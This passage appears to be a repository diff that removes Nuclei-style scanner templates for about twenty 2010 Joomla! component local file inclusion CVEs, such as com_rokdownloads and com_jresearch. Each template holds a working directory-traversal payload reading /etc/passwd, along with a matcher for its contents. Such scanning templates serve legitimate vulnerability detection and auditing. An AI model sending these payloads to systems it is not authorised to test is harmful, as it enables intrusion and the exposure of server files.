tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11760
- https://nvd.nist.gov/vuln/detail/CVE-2010-1056
- http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/
- http://web.archive.org/web/20151023104850/http://secunia.com/advisories/38982/
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-1056
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,32 +0,0 @@
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11511
- https://nvd.nist.gov/vuln/detail/CVE-2010-1081
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1081
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2010-1217
info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference:
- https://www.exploit-db.com/exploits/11814
- https://nvd.nist.gov/vuln/detail/CVE-2010-1217
- http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
- http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2010-1217
cwe-id: CWE-22
tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11757
- https://nvd.nist.gov/vuln/detail/CVE-2010-1219
- http://web.archive.org/web/20161009134632/http://secunia.com/advisories/38952
- http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-1219
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11978
- https://nvd.nist.gov/vuln/detail/CVE-2010-1302
- http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/
- http://web.archive.org/web/20140805062036/http://secunia.com/advisories/39200/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1302
cwe-id: CWE-22
tags: edb,cve,cve2010,joomla,lfi,graph
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11998
- https://nvd.nist.gov/vuln/detail/CVE-2010-1304
- http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174
- http://www.exploit-db.com/exploits/11998
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1304
cwe-id: CWE-22
tags: cve2010,joomla,lfi,status,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12065
- https://nvd.nist.gov/vuln/detail/CVE-2010-1305
- http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
- http://web.archive.org/web/20140806165126/http://secunia.com/advisories/39351/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1305
cwe-id: CWE-22
tags: joomla,lfi,edb,cve,cve2010
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://nvd.nist.gov/vuln/detail/CVE-2010-1306
- http://web.archive.org/web/20140805134149/http://secunia.com/advisories/39338/
- http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-1306
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1307
info:
name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12070
- https://nvd.nist.gov/vuln/detail/CVE-2010-1307
- http://web.archive.org/web/20140806154402/http://secunia.com/advisories/39348/
- http://www.vupen.com/english/advisories/2010/0806
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1307
cwe-id: CWE-22
tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,32 +0,0 @@
id: CVE-2010-1308
info:
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12066
- https://nvd.nist.gov/vuln/detail/CVE-2010-1308
- http://www.vupen.com/english/advisories/2010/0809
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1308
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1312
info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12077
- https://nvd.nist.gov/vuln/detail/CVE-2010-1312
- http://web.archive.org/web/20140724200344/http://secunia.com/advisories/39289/
- http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1312
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1313
info:
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12082
- https://nvd.nist.gov/vuln/detail/CVE-2010-1313
- http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
- http://www.exploit-db.com/exploits/12082
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cve-id: CVE-2010-1313
cwe-id: CWE-22
cvss-score: 4.3
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1314
info:
name: Joomla! Component Highslide 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12086
- https://nvd.nist.gov/vuln/detail/CVE-2010-1314
- http://web.archive.org/web/20140724203458/http://secunia.com/advisories/39359/
- http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1314
cwe-id: CWE-22
tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1315
info:
name: Joomla! Component webERPcustomer - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11999
- https://nvd.nist.gov/vuln/detail/CVE-2010-1315
- http://web.archive.org/web/20140801092842/http://secunia.com/advisories/39209/
- http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1315
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1340
info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33797
- https://nvd.nist.gov/vuln/detail/CVE-2010-1340
- http://web.archive.org/web/20210121195000/https://www.securityfocus.com/bid/38917/
- http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1340
cwe-id: CWE-22
tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,32 +0,0 @@
id: CVE-2010-1345
info:
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15453
- https://nvd.nist.gov/vuln/detail/CVE-2010-1345
- http://www.exploit-db.com/exploits/11785
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1345
cwe-id: CWE-22
tags: lfi,edb,cve,cve2010,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1352
info:
name: Joomla! Component Juke Box 1.7 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12084
- https://nvd.nist.gov/vuln/detail/CVE-2010-1352
- http://web.archive.org/web/20140724194110/http://secunia.com/advisories/39357/
- http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1352
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

View File

@ -1,33 +0,0 @@
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12068
- https://nvd.nist.gov/vuln/detail/CVE-2010-1353
- http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/
- http://www.vupen.com/english/advisories/2010/0808
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1353
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/30

Some files were not shown because too many files have changed in this diff Show More